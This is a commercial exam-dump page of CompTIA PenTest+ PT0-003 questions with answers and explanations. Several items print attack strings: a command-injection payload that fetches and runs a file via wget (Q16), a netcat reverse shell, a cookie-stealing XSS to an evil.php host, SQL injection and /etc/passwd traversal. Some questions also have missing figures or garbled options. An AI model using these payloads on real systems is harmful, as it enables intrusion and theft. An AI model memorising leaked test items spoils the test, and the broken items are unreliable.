• Home
  • Articles
  • (2024) PASS PT0-003 exam with CompTIA PT0-003 Real Exam Questions [Q13-Q36]

(2024) PASS PT0-003 exam with CompTIA PT0-003 Real Exam Questions [Q13-Q36]

Share

(2024) PASS PT0-003 exam with CompTIA PT0-003 Real Exam Questions

Real exam questions are provided for CompTIA PenTest+ tests, which can make sure you 100% pass

NEW QUESTION # 13
A software company has hired a security consultant to assess the security of the company's software development practices. The consultant opts to begin reconnaissance by performing fuzzing on a software binary. Which of the following vulnerabilities is the security consultant MOST likely to identify?

  • A. Credentials stored in strings
  • B. Non-optimized resource management
  • C. Weak authentication schemes
  • D. Buffer overflows

Answer: D

Explanation:
fuzzing introduces unexpected inputs into a system and watches to see if the system has any negative reactions to the inputs that indicate security, performance, or quality gaps or issues


NEW QUESTION # 14
A penetration tester has gained access to the Chief Executive Officer's (CEO's) internal, corporate email. The next objective is to gain access to the network.
Which of the following methods will MOST likely work?

  • A. Try to obtain the private key used for S/MIME from the CEO's account.
  • B. Attempt to escalate privileges on the mail server to gain root access.
  • C. Move laterally from the mail server to the domain controller.
  • D. Send an email from the CEO's account, requesting a new account.

Answer: B


NEW QUESTION # 15
An Nmap scan of a network switch reveals the following:

Which of the following technical controls will most likely be the FIRST recommendation for this device?

  • A. Encrypted passwords
  • B. Multifactor authentication
  • C. System-hardening techniques
  • D. Network segmentation

Answer: C


NEW QUESTION # 16
A penetration tester was able to gain access to a system using an exploit. The following is a snippet of the code that was utilized:
exploit = "POST "
exploit += "/cgi-bin/index.cgi?action=login&Path=%27%0A/bin/sh${IFS} -
c${IFS}'cd${IFS}/tmp;${IFS}wget${IFS}http://10.10.0.1/apache;${IFS}chmod${IFS}777${IFS}apache;${IF
&loginUser=a&Pwd=a"
exploit += "HTTP/1.1"
Which of the following commands should the penetration tester run post-engagement?

  • A. chmod 600 /tmp/apache
  • B. rm -rf /tmp/apache
  • C. grep -v apache ~/.bash_history > ~/.bash_history
  • D. taskkill /IM "apache" /F

Answer: B

Explanation:
The exploit code is a command injection attack that uses a vulnerable CGI script to execute arbitrary commands on the target system. The commands are:
cd /tmp: change the current directory to /tmp
wget
http://10.10.0.1/apache: download a file named apache from http://10.10.0.1 chmod 777 apache: change the permissions of the file to allow read, write, and execute for everyone
./apache: run the file as an executable
The file apache is most likely a malicious payload that gives the attacker remote access to the system or performs some other malicious action. Therefore, the penetration tester should run the command rm -rf
/tmp/apache post-engagement to remove the file and its traces from the system. The other commands are not effective or relevant for this purpose.


NEW QUESTION # 17
A penetration tester wants to test a list of common passwords against the SSH daemon on a network device.
Which of the following tools would be BEST to use for this purpose?

  • A. Hashcat
  • B. Patator
  • C. Mimikatz
  • D. John the Ripper

Answer: B

Explanation:
https://www.kali.org/tools/patator/


NEW QUESTION # 18
A CentOS computer was exploited during a penetration test. During initial reconnaissance, the penetration tester discovered that port 25 was open on an internal Sendmail server. To remain stealthy, the tester ran the following command from the attack machine:

Which of the following would be the BEST command to use for further progress into the targeted network?

  • A. ssh 127.0.0.1 5555
  • B. ssh 10.10.1.2
  • C. nc 127.0.0.1 5555
  • D. nc 10.10.1.2

Answer: C


NEW QUESTION # 19
A penetration tester is attempting to discover live hosts on a subnet quickly.
Which of the following commands will perform a ping scan?

  • A. nmap -sn 10.12.1.0/24
  • B. nmap -Pn 10.12.1.0/24
  • C. nmap -sV -A 10.12.1.0/24
  • D. nmap -sT -p- 10.12.1.0/24

Answer: A

Explanation:
Reference: https://www.tecmint.com/find-live-hosts-ip-addresses-on-linux-network/


NEW QUESTION # 20
During an assessment, a penetration tester obtains an NTLM hash from a legacy Windows machine. Which of the following tools should the penetration tester use to continue the attack?

  • A. Responder
  • B. CrackMapExec
  • C. Hydra
  • D. BloodHound

Answer: B

Explanation:
When a penetration tester obtains an NTLM hash from a legacy Windows machine, they need to use a tool that can leverage this hash for further attacks, such as pass-the-hash attacks, or for cracking the hash. Here's a breakdown of the options:
Option A: Responder
Responder is primarily used for poisoning LLMNR, NBT-NS, and MDNS to capture hashes, but not for leveraging NTLM hashes obtained post-exploitation.
Option B: Hydra
Hydra is a password-cracking tool but not specifically designed for NTLM hashes or pass-the-hash attacks.
Option C: BloodHound
BloodHound is used for mapping out Active Directory relationships and identifying potential attack paths but not for using NTLM hashes directly.
Option D: CrackMapExec
CrackMapExec is a versatile tool that can perform pass-the-hash attacks, execute commands, and more using NTLM hashes. It is designed for post-exploitation scenarios involving NTLM hashes.
Reference from Pentest:
Forge HTB: Demonstrates the use of CrackMapExec for leveraging NTLM hashes to gain further access within a network.
Horizontall HTB: Shows how CrackMapExec can be used for various post-exploitation activities, including using NTLM hashes to authenticate and execute commands.
Conclusion:
Option D, CrackMapExec, is the most suitable tool for continuing the attack using an NTLM hash.
It supports pass-the-hash techniques and other operations that can leverage NTLM hashes effectively.


NEW QUESTION # 21
A penetration tester wants to find the password for any account in the domain without locking any of the accounts. Which of the following commands should the tester use?

  • A. cme smb 192.168.0.0/24 -u /userList.txt -p /passwordList.txt
  • B. enum4linux -u userl -p Passwordl 192.168.0.1
  • C. enum4linux -u userl -p /passwordList.txt 192.168.0.1
  • D. cme smb 192.168.0.0/24 -u /userList.txt -p Summer123

Answer: A

Explanation:
The cme smb 192.168.0.0/24 -u /userList.txt -p /passwordList.txt command is used to perform SMB enumeration on the 192.168.0.0/24 subnet using a list of usernames and passwords. The -u option specifies the file containing the usernames, and the -p option specifies the file containing the passwords1. This command allows the tester to attempt to authenticate with multiple accounts without locking any of them out.
References: SMB Command


NEW QUESTION # 22
A penetration tester has extracted password hashes from the lsass.exe memory process. Which of the following should the tester perform NEXT to pass the hash and provide persistence with the newly acquired credentials?

  • A. Use Patator to pass the hash and Responder for persistence.
  • B. Use Mimikatz to pass the hash and PsExec for persistence.
  • C. Use a bind shell to pass the hash and WMI for persistence.
  • D. Use Hashcat to pass the hash and Empire for persistence.

Answer: B

Explanation:
Mimikatz is a credential hacking tool that can be used to extract logon passwords from the LSASS process and pass them to other systems. Once the tester has the hashes, they can then use PsExec, a command-line utility from Sysinternals, to pass the hash to the remote system and authenticate with the new credentials.
This provides the tester with persistence on the system, allowing them to access it even after a reboot.
"A penetration tester who has extracted password hashes from the lsass.exe memory process can use various tools to pass the hash and gain access to other systems using the same credentials. One tool commonly used for this purpose is Mimikatz, which can extract plaintext passwords from memory or provide a pass-the-hash capability. After gaining access to a system, the tester can use various tools for persistence, such as PsExec or WMI." (CompTIA PenTest+ Study Guide, p. 186)


NEW QUESTION # 23
You are a security analyst tasked with hardening a web server.
You have been given a list of HTTP payloads that were flagged as malicious.
INSTRUCTIONS
Given the following attack signatures, determine the attack type, and then identify the associated remediation to prevent the attack in the future.
If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.


Answer:

Explanation:



Explanation:
1. Reflected XSS - Input sanitization (<> ...)
2. Sql Injection Stacked - Parameterized Queries
3. DOM XSS - Input Sanitization (<> ...)
4. Local File Inclusion - sandbox req
5. Command Injection - sandbox req
6. SQLi union - paramtrized queries
7. SQLi error - paramtrized queries
8. Remote File Inclusion - sandbox
9. Command Injection - input saniti $
10. URL redirect - prevent external calls


NEW QUESTION # 24
Penetration on an assessment for a client organization, a penetration tester notices numerous outdated software package versions were installed ...s-critical servers. Which of the following would best mitigate this issue?

  • A. Refrainment from patching systems until quality assurance approves
  • B. Implementation of patching and change control programs
  • C. Revision of client scripts used to perform system updates
  • D. Remedial training for the client's systems administrators

Answer: B

Explanation:
The best way to mitigate this issue is to implement patching and change control programs, which are processes that involve applying updates or fixes to software packages to address vulnerabilities, bugs, or performance issues, and managing or documenting the changes made to the software packages to ensure consistency, compatibility, and security. Patching and change control programs can help prevent or reduce the risk of attacks that exploit outdated software package versions, which may contain known or unknown vulnerabilities that can compromise the security or functionality of the systems or servers. Patching and change control programs can be implemented by using tools such as WSUS, which is a tool that can manage and distribute updates for Windows systems and applications1, or Git, which is a tool that can track and control changes to source code or files2. The other options are not valid ways to mitigate this issue. Revision of client scripts used to perform system updates is not a sufficient way to mitigate this issue, as it may not address the root cause of why the software package versions are outdated, such as lack of awareness, resources, or policies. Remedial training for the client's systems administrators is not a direct way to mitigate this issue, as it may not result in immediate or effective actions to update the software package versions.
Refrainment from patching systems until quality assurance approves is not a way to mitigate this issue, but rather a potential cause or barrier for why the software package versions are outdated.


NEW QUESTION # 25
SIMULATION
You are a penetration tester running port scans on a server.
INSTRUCTIONS
Part 1: Given the output, construct the command that was used to generate this output from the available options.
Part 2: Once the command is appropriately constructed, use the given output to identify the potential attack vectors that should be investigated further.
If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.

Answer:

Explanation:
See explanation below
Explanation:
Part 1 - 192.168.2.2 -O -sV --top-ports=100 and SMB vulns
Part 2 - Weak SMB file permissions
https://subscription.packtpub.com/book/networking-and-servers/9781786467454/1/ch01lvl1sec13/fingerprinting-os-and-services-running-on-a-target-host


NEW QUESTION # 26
A red-team tester has been contracted to emulate the threat posed by a malicious insider on a company's network, with the constrained objective of gaining access to sensitive personnel files. During the assessment, the red-team tester identifies an artifact indicating possible prior compromise within the target environment.
Which of the following actions should the tester take?

  • A. Halt the assessment and follow the reporting procedures as outlined in the contract.
  • B. Incorporate the newly identified method of compromise into the red team's approach.
  • C. Create a detailed document of findings before continuing with the assessment.
  • D. Perform forensic analysis to isolate the means of compromise and determine attribution.

Answer: A

Explanation:
Halting the assessment and following the reporting procedures as outlined in the contract is the best action to take after identifying that an application being tested has already been compromised with malware. This is because continuing the assessment might interfere with an ongoing investigation or compromise evidence collection. The reporting procedures are part of the contract that specifies how to handle any critical issues or incidents during the penetration testing engagement. They should include details such as who to contact, what information to provide, and what steps to follow.


NEW QUESTION # 27
Given the following Nmap scan command:
[root@kali ~]# nmap 192.168.0 .* -- exclude 192.168.0.101

Which of the following is the total number of servers that Nmap will attempt to scan?

  • A. 0
  • B. 1
  • C. 2
  • D. 3

Answer: C

Explanation:
The Nmap scan command given will scan all the hosts in the 192.168.0.0/24 subnet, except for the one with the IP address 192.168.0.101. The subnet has 256 possible hosts, but one of them is excluded, so the total number of servers that Nmap will attempt to scan is 255. References:
Nmap Commands - 17 Basic Commands for Linux Network, Section: Scan Multiple Hosts, Subsection: Excluding Hosts from Search Nmap Cheat Sheet 2023: All the Commands and More, Section: Target Specification, Subsection:
-exclude


NEW QUESTION # 28
A penetration tester has obtained root access to a Linux-based file server and would like to maintain persistence after reboot. Which of the following techniques would BEST support this objective?

  • A. Obtain /etc/shadow and brute force the root password.
  • B. Move laterally to create a user account on LDAP
  • C. Create a one-shot system service to establish a reverse shell.
  • D. Run the nc -e /bin/sh <...> command.

Answer: C

Explanation:
https://hosakacorp.net/p/systemd-user.html
Creating a one-shot system service to establish a reverse shell is a technique that would best support maintaining persistence after reboot on a Linux-based file server. A system service is a program that runs in the background and performs various tasks without user interaction. A one-shot system service is a type of service that runs only once and then exits. A reverse shell is a type of shell that connects back to an attacker-controlled machine and allows remote command execution. By creating a one-shot system service that runs a reverse shell script at boot time, the penetration tester can ensure persistent access to the file server even after reboot.


NEW QUESTION # 29
A penetration tester executes the following Nmap command and obtains the following output:

Which of the following commands would best help the penetration tester discover an exploitable service?
A)

B)

C)

D)

  • A. nmap -v -p 25 -- soript smtp-enum-users remotehost
  • B. nmap -p 3306 -- script "http*vuln*" remotehost
  • C. nmap --ocript=omb-brute.noe remotehoat
  • D. nmap -v -- script=mysql-info.nse remotehost

Answer: D

Explanation:
The Nmap command in the question scans all ports on the remote host and identifies the services and versions running on them. The output shows that port 3306 is open and running MariaDB, which is a fork of MySQL. Therefore, the best command to discover an exploitable service would be to use the mysql-info.nse script, which gathers information about the MySQL server, such as the version, user accounts, databases, and configuration variables. The other commands are either misspelled, irrelevant, or too broad for the task. References: Best PenTest+ certification study resources and training materials, CompTIA PenTest+ PT0-002 Cert Guide, 101 Labs - CompTIA PenTest+: Hands-on Labs for the PT0-002 Exam


NEW QUESTION # 30
During the reconnaissance phase, a penetration tester collected the following information from the DNS records:
A-----> www
A-----> host
TXT --> vpn.comptia.org
SPF---> ip =2.2.2.2
Which of the following DNS records should be in place to avoid phishing attacks using spoofing domain techniques?

  • A. CNAME
  • B. SOA
  • C. MX
  • D. DMARC

Answer: D

Explanation:
DMARC (Domain-based Message Authentication, Reporting & Conformance) is an email authentication protocol that helps prevent email spoofing and phishing. It builds on SPF (Sender Policy Framework) and DKIM (DomainKeys Identified Mail) to provide a mechanism for email senders and receivers to improve and monitor the protection of the domain from fraudulent email.
Step-by-Step Explanation
Understanding DMARC:
SPF: Defines which IP addresses are allowed to send emails on behalf of a domain.
DKIM: Provides a way to check that an email claiming to come from a specific domain was indeed authorized by the owner of that domain.
DMARC: Uses SPF and DKIM to determine the authenticity of an email and specifies what action to take if the email fails the authentication checks.
Implementing DMARC:
Create a DMARC policy in your DNS records. This policy can specify to reject, quarantine, or take no action on emails that fail SPF or DKIM checks.
Example DMARC record: v=DMARC1; p=reject; rua=mailto:[email protected]; Benefits of DMARC:
Helps to prevent email spoofing and phishing attacks.
Provides visibility into email sources through reports.
Enhances domain reputation by ensuring only legitimate emails are sent from the domain.
DMARC Record Components:
v: Version of DMARC.
p: Policy for handling emails that fail the DMARC check (none, quarantine, reject).
rua: Reporting URI of aggregate reports.
ruf: Reporting URI of forensic reports.
pct: Percentage of messages subjected to filtering.
Real-World Example:
A company sets up a DMARC policy with p=reject to ensure that any emails failing SPF or DKIM checks are rejected outright, significantly reducing the risk of phishing attacks using their domain.
Reference from Pentesting Literature:
In "Penetration Testing - A Hands-on Introduction to Hacking," DMARC is mentioned as part of email security protocols to prevent phishing.
HTB write-ups often highlight the importance of DMARC in securing email communications and preventing spoofing attacks.
Reference:
Penetration Testing - A Hands-on Introduction to Hacking
HTB Official Writeups


NEW QUESTION # 31
Which of the following assessment methods is the most likely to cause harm to an ICS environment?

  • A. Active scanning
  • B. Protocol reversing
  • C. Ping sweep
  • D. Packet analysis

Answer: A

Explanation:
Active scanning is the process of sending probes or packets to a target system or network and analyzing the responses to gather information or identify vulnerabilities. Active scanning can be intrusive and disruptive, especially in an ICS environment, where availability and reliability are critical. Active scanning can cause unintended consequences, such as triggering alarms, shutting down devices, or affecting physical processes.
Therefore, active scanning is the most likely to cause harm to an ICS environment among the given options.
References:
*The Official CompTIA PenTest+ Study Guide (Exam PT0-002), Chapter 2: Conducting Passive Reconnaissance, page 72-73.
*The Official CompTIA PenTest+ Student Guide (Exam PT0-002) eBook1, Chapter 2: Conducting Passive Reconnaissance, page 2-20.
*Risk Assessment Standards for ICS Environments2, page 8.


NEW QUESTION # 32
A security engineer is trying to bypass a network IPS that isolates the source when the scan exceeds 100 packets per minute. The scope of the scan is to identify web servers in the 10.0.0.0/16 subnet.
Which of the following commands should the engineer use to achieve the objective in the least amount of time?

  • A. nmap -T4 -p 80 10.0.0.0/16 -- max-rate 60
  • B. nmap -T5 -p 80 10.0.0.0/16 -- min-rate 80
  • C. nmap -T3 -p 80 10.0.0.0/16 -- max-hostgroup 100
  • D. nmap -TO -p 80 10.0.0.0/16

Answer: A

Explanation:
The nmap -T4 -p 80 10.0.0.0/16 -- max-rate 60 command is used to scan the 10.0.0.0/16 subnet for web servers (port 80) at a maximum rate of 60 packets per minute. The -T4 option sets the timing template to
"aggressive", which speeds up the scan. The --max-rate option limits the number of packets sent per second, helping to bypass the network IPS that isolates the source when the scan exceeds 100 packets per minute12.
References: Nmap commands


NEW QUESTION # 33
A tester who is performing a penetration test on a website receives the following output:
Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /var/www/search.php on line 62 Which of the following commands can be used to further attack the website?

  • A. /var/www/html/index.php;whoami
  • B. 1 UNION SELECT 1, DATABASE(),3--
  • C. ../../../../../../../../../../etc/passwd
  • D. <script>var adr= '../evil.php?test=' + escape(document.cookie);</script>

Answer: B


NEW QUESTION # 34
A penetration tester exploited a unique flaw on a recent penetration test of a bank. After the test was completed, the tester posted information about the exploit online along with the IP addresses of the exploited machines. Which of the following documents could hold the penetration tester accountable for this action?

  • A. SLA
  • B. NDA
  • C. ROE
  • D. MSA

Answer: B


NEW QUESTION # 35
A penetration tester identifies an exposed corporate directory containing first and last names and phone numbers for employees. Which of the following attack techniques would be the most effective to pursue if the penetration tester wants to compromise user accounts?

  • A. Smishing
  • B. Impersonation
  • C. Whaling
  • D. Tailgating

Answer: A

Explanation:
When a penetration tester identifies an exposed corporate directory containing first and last names and phone numbers, the most effective attack technique to pursue would be smishing. Here's why:
Understanding Smishing:
Smishing (SMS phishing) involves sending fraudulent messages via SMS to trick individuals into revealing personal information or performing actions that compromise security. Since the tester has access to phone numbers, this method is directly applicable.
Why Smishing is Effective:
Personalization: Knowing the first and last names allows the attacker to personalize the messages, making them appear more legitimate and increasing the likelihood of the target responding.
Immediate Access: People tend to trust and respond quickly to SMS messages compared to emails, especially if the messages appear urgent or important.
Alternative Attack Techniques:
Impersonation: While effective, it generally requires real-time interaction and may not scale well across many targets.
Tailgating: This physical social engineering technique involves following someone into a restricted area and is not feasible with just names and phone numbers.
Whaling: This targets high-level executives with highly personalized phishing attacks. Although effective, it is more specific and may not be suitable for the broader set of employees in the directory.


NEW QUESTION # 36
......

Latest PT0-003 Pass Guaranteed Exam Dumps Certification Sample Questions: https://prep4sure.real4dumps.com/PT0-003-prep4sure-exam.html

Related Articles

more
CompTIA PT0-003 Certification Practice Exam

We are an official authorized large company offering exam prep, real test dumps and latest dumps which can help you pass exam surely. Your money is guaranteed and will be refunded if you fail the exam.

Latest Exam Questions

Useful Links

Contact Us

Our Working Time: ( GMT 0:00-15:00 )
From Monday to Saturday

Support: Contact now 

If you have any question please leave me your email address, we will reply and send email to you in 12 hours.

Copyright © 2026 Real4dumps NETWORK CO.,LIMITED. All Rights Reserved. All trademarks used are properties of their respective owners. Privacy Policy